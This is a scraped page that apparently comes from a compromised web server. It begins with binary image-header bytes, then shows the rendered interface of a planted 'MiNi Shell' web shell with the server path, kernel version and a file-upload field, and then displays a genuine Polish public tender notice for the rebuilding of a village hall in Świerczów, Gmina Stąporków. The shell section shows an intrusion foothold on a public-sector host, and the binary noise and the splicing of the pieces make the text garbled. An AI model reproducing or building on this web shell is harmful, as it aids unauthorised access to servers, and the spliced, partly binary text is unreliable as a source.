JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220316/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220316/0008813601-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „PRZEBUDOWA I TERMOMODERNIZACJA ŚWIETLICY WIEJSKIEJ W MIEJSCOWOŚCI ŚWIERCZÓW W CELU ZWIĘKSZENIA ATRAKCYJNOŚCI OBSZARÓW WIEJSKICH W GMINIE STĄPORKÓW” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA STĄPORKÓW</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 291009900</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Marszałka Józefa Piłsudskiego 132A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Stąporków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">26-220</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">świętokrzyskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL721 - Kielecki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@staporkow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.staporkow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „PRZEBUDOWA I TERMOMODERNIZACJA ŚWIETLICY WIEJSKIEJ W MIEJSCOWOŚCI ŚWIERCZÓW W CELU ZWIĘKSZENIA ATRAKCYJNOŚCI OBSZARÓW WIEJSKICH W GMINIE STĄPORKÓW” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-33e26ddf-a51b-11ec-80f8-1ad70aec7fa4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00088136</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-03-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00026690/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Przebudowa świetlicy wiejskiej w miejscowości Świerczów wraz z zakupem wyposażenia w celu zwiększenia atrakcyjności obszarów wiejskich w gminie Stąporków</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Przedmiot zamówienia jest dofinansowany w ramach Programu Rozwoju Obszarów Wiejskich na lata 2014-2020 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu:<br/>a) miniPortalu, dostępnego pod adresem: https://miniportal.uzp.gov.pl<br/>b) ePUAPu, dostępnego pod adresem: https://epuap.gov.pl/wps/portal<br/>c) poczty elektronicznej Zamawiającego: przetargi@staporkow.pl<br/>d) elektronicznej skrzynki podawczej Zamawiającego na platformie ePUAP</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawcy, którzy chcą złożyć ofertę w niniejszym postępowaniu o<br/>udzielenie zamówienia publicznego muszą posiadać konto na Platformie ePUAP.<br/>- Sposób komunikowania się Zamawiającego z Wykonawcami (Uwaga: nie dotyczy składania oferty):<br/>a) komunikacja w niniejszym postępowaniu o udzielenie zamówienia publicznego obejmująca wymianę informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą z<br/>uwzględnieniem wyjątków określonych w ustawie Prawo zamówień publicznych, odbywała się będzie przy użyciu środków komunikacji elektronicznej za pośrednictwem odpowiedniego formularza<br/>dostępnego na platformie ePUAP udostępnianego przez miniPortal w zakładce formularz do komunikacji lub za pomocą poczty elektronicznej.<br/>b) Zarówno Wykonawca jak i Zamawiający we wszelkiej korespondencji związanej z niniejszym postępowaniem o udzielenie zamówienia publicznego zobowiązaniu są do posługiwania się numerem ogłoszenia zamieszczonego w Biuletynie Zamówień Publicznych lub ID postępowania.<br/>c) Zamawiający informuje, że w niniejszym postępowaniu będzie komunikował się z Wykonawcami przy użyciu poczty elektronicznej poprzez adres mailowy: przetargi@staporkow.pl<br/>d) Wszelkie dokumenty elektronicznej, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń Wykonawca składa jako załączniki.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BIN.271.3.2022/ŁJ</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest przebudowa i termomodernizacja świetlicy wiejskiej w miejscowości Świerczów w gminie Stąporków Opis przedmiotu zamówienia stanowi<br/>1)	Załącznik 1A – dokumentacja projektowa<br/>2)	Załącznik 1B – STWiORB<br/>3)	Załącznik 1C- Przedmiar robót (dokument pomocniczy)<br/>4)	Załącznik 1D – Dokumenty formalno-prawne<br/>2.	Zakres inwestycji obejmuje: <br/>Przebudowę i termomodernizację istniejącego budynku świetlicy w Świerczowie polegająca na wykonaniu:<br/>- robót rozbiórkowych: pokrycia dachowego, podłóg i posadzek, zbędnych ścianek działowych, stolarki otworowej;<br/>- robót budowlanych zewnętrznych: wymiana pokrycia dachowego ze wzmocnieniem osłabionych elementów więźby dachowej, naprawa pęknięć ścian zewnętrznych, wymiana i likwidacja stolarki drzwiowej i okiennej, ocieplenie ścian zewnętrznych nadzienia i ścian fundamentowych, zainstalowanie nowej bramy garażowej, przebudowa wejścia do budynku wraz z wykonaniem pochylni dla niepełnosprawnych i balustradą, wykonanie opaski z kostki betonowej wokół budynku, wykonanie odprowadzenia wód opadowych z dachu budynku na teren nieutwardzony działki<br/>- robót budowlanych wewnętrznych: naprawa stropów żelbetowych, naprawa pęknięć ścian wew., wymiana stolarki wew.,<br/>przebudowa drzwi wew., wykonanie pomieszczenia wc męskiego oraz wc dla niepełnosprawnych + dla kobiet, wykonanie kanałów wentylacji grawitacyjnej dla wszystkich pomieszczeń, obniżenie poziomu podłogi w sali głównej, ocieplenie warstw posadzkowych, ocieplenie stropów, wykonanie nowych ścianek działowych i posadzek, naprawa tynków wewnętrznych i wykonanie gładzi gipsowych, malowanie ścian i sufitów, wykonanie okładzin ceramicznych w pom. kuchennym i wc,:<br/>- roboty instalacyjne zewnętrzne: zainstalowanie paneli fotowoltaicznych, zainstalowanie zewnętrznego oświetlenia ledowego z czujnikiem ruchu;<br/>- roboty instalacyjne wewnętrzne: wykonanie nowej instalacji elektrycznej wewnętrznej oraz zewnętrznej wraz z przebudową przyłącza i układu pomiarowego energii elektrycznej zgodnie z warunkami przebudowy wydanymi przez PGE, montaż kurtyny powietrznej na drzwiami wejściowymi, rozbudowa instalacji wew. sanitarnej i wodociągowej wraz z montażem wyposażenia wc dla niepełnosprawnych i kobiet, wc dla mężczyzn, pomieszczenie kuchni i pomieszczenia porządkowego, instalacja nowego źródła ciepła – pompa ciepła powietrze – woda i zasobnika c.w.u, wykonanie kominka z płaszczem wodnym i zestawem pompowo-wymiennikowym<br/><br/>Inwestycja zlokalizowana jest na działkach o nr ew.476/1, 478/1, 480/1, 480/2 położonej w miejscowości Świerczów, gm. Stąporków. Budynek jednokondygnacyjny bez podpiwniczenia przeznaczony jest pod potrzeby społeczności lokalnej, jako świetlica wiejska. Po przebudowie ma być dostępny dla niepełnosprawnych z poziomu terenu za pomocą pochylni dla niepełnosprawnych. Konstrukcja budynku murowana tradycyjna ze stropem po części prefabrykowanym i żelbetowym. Ściany zewnętrzne wykonane jako warstwowe murowane z elementów silikatowych i gazobetonowych, dach dwuspadowy o konstrukcji drewnianej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45111100-9 - Roboty w zakresie burzenia</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45211300-2 - Roboty budowlane w zakresie budowy domów</p> <p class="mb-0">45262500-6 - Roboty murarskie i murowe</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45320000-6 - Roboty izolacyjne</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45421100-5 - Instalowanie drzwi i okien, i podobnych elementów</p> <p class="mb-0">45430000-0 - Pokrywanie podłóg i ścian</p> <p class="mb-0">45440000-3 - Roboty malarskie i szklarskie</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie kierował się niżej wskazanymi<br/>kryteriami:<br/>Cena (C) - 60 pkt<br/>Okres gwarancji (G) - 40 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy nie podlegają wykluczeniu z postępowania na podstawie art. 108 ust. 1, a także art. 109 ust. 1 pkt 4), 5), 7) oraz 10) ustawy Pzp oraz spełniają warunki określone w art. 112 ustawy Pzp dotyczące:<br/><br/>1.1.	Zdolności do występowania w obrocie gospodarczym. <br/>Zamawiający nie stawia warunku odnośnie zdolności Wykonawcy w obrocie gospodarczym.<br/>1.2.	Uprawnień do prowadzenia w danym zakresie określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów. <br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań.<br/>1.3.	Sytuacji ekonomicznej lub finansowej. <br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań.<br/>1.4.	Zdolności technicznej lub zawodowej.<br/>Wykonawca spełni warunek udziału w postępowaniu dotyczący zdolności zawodowej, jeżeli wykaże, że:<br/>a)	w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, zrealizował nie mniej niż 1 zadanie polegające na wykonaniu robót budowlanych w zakresie budowy/przebudowy/rozbudowy budynku użyteczności publicznej* wraz z montażem odnawialnych źródeł energii (tj. pompa ciepła lub instalacja fotowoltaiczna) za kwotę nie mniejszą niż 300 000,00 PLN brutto (wykonanej w ramach jednej umowy z Wykonawcą). <br/>* budynku użyteczności publicznej - należy przez to rozumieć budynek przeznaczony na potrzeby administracji publicznej, wymiaru sprawiedliwości, kultury, kultu religijnego, oświaty, szkolnictwa wyższego, nauki, wychowania, opieki zdrowotnej, społecznej lub socjalnej, obsługi bankowej, handlu, gastronomii, usług, w tym usług pocztowych lub telekomunikacyjnych, turystyki, sportu, obsługi pasażerów w transporcie kolejowym, drogowym, lotniczym, morskim lub wodnym śródlądowym, oraz inny budynek przeznaczony do wykonywania podobnych funkcji; za budynek użyteczności publicznej uznaje się także budynek biurowy lub socjalny<br/><br/>b)	że dysponuje lub będzie dysponować w okresie przewidzianym na realizację zamówienia osobami legitymującymi się kwalifikacjami zawodowymi oraz doświadczeniem odpowiednio do objęcia funkcji, jakie zostaną im powierzone tj.: <br/>- Kierownikiem budowy - 1 osoba posiadająca uprawnienia budowlane do kierowania budową i robotami budowlanymi w specjalności konstrukcyjno-budowlanymi bez ograniczeń,<br/>- Kierownikiem robót sanitarnych - 1 osoba posiadającym uprawnienia budowlane do kierowania robotami w specjalności instalacyjnej, w zakresie instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, <br/>- Kierownikiem robót elektrycznych - 1 osoba posiadającym uprawnienia budowlane do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.<br/><br/>Wskazana osoba powinna posiadać wymagane uprawnienia budowlane i przynależeć do właściwej izby samorządu zawodowego, jeżeli taki wymóg nakłada na nią ustawa Prawo budowlane. Zgodnie z art. 12a Prawa budowlanego, który to odsyła do ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2020 r. poz. 220 przynależność do właściwej izby samorządu zawodowego nie jest wymagana od obywateli państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub państw członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) gdyż do posiadania uprawnień w wykonywaniu samodzielnych funkcji w budownictwie nie jest wymagana przynależności do izby samorządu zawodowego. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty; – załącznik nr 8 do SWZ,<br/>2.	wykaz osób skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami; – załącznik nr 9 do SWZ,</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Zgodnie z SWZ:<br/>Dokument potwierdzający umocowanie do reprezentowania<br/>Pełnomocnictwo - jeżeli dotyczy<br/>Zobowiązanie podmiotu trzeciego - jeżeli dotyczy <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 4. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>4.1. w takim przypadku:<br/> Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego,<br/> wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem,<br/> żaden z nich nie może podlegać wykluczeniu na podstawie art. 108 ust. 1 ustawy Pzp, oraz w przypadkach, o których mowa w rozdz. VII pkt 2, natomiast spełnianie warunków udziału w postępowaniu Wykonawcy wykazują zgodnie z wymogami opisanymi w rozdz. VI pkt. 1.<br/> oświadczenie, o którym mowa w rozdz. VIII pkt 1 ppkt. 1.2 składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>4.2. W przypadku, gdy spełnienie warunku opisanego:<br/>1) w rozdz. VI pkt 1 ppkt. 1.4 wykazuje co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>2) w rozdz. VI pkt 1 ppkt. 1.4 Wykonawcy wykazują poprzez <br/> Wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, zgodnie z art. 117 pkt. 4 Ustawy Pzp zobligowani są do złożenia wraz z ofertą oświadczenia, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Ze względu na ograniczoną ilość znaków pełen zakres zmian dostępny jest w zał. 5 do SWZ.<br/>1.	Zamawiający (Zam) dopuszcza zmiany w Umowie (UM), pod warunkiem spełnienia przesłanek ustawowych określonych w przepisie art. 455 ustawy Pzp.<br/>2.	Wszelkie zmiany UM wymagają zgody obu Stron i zachowania formy pisemnej.<br/>3.	Zam. zgodnie z przepisem art. 455 ust. 1 pkt 1 ustawy Pzp przewiduje następujące zmiany UM:<br/>1)	sposobu realizacji Przedmiotu UM lub jego części;<br/>2)	zmniejszenia zakresu w przypadku opisanym w § 2 ust. 4 oraz w przypadku wystąpienia zmiany okoliczności spowodowanej lub odpowiednio 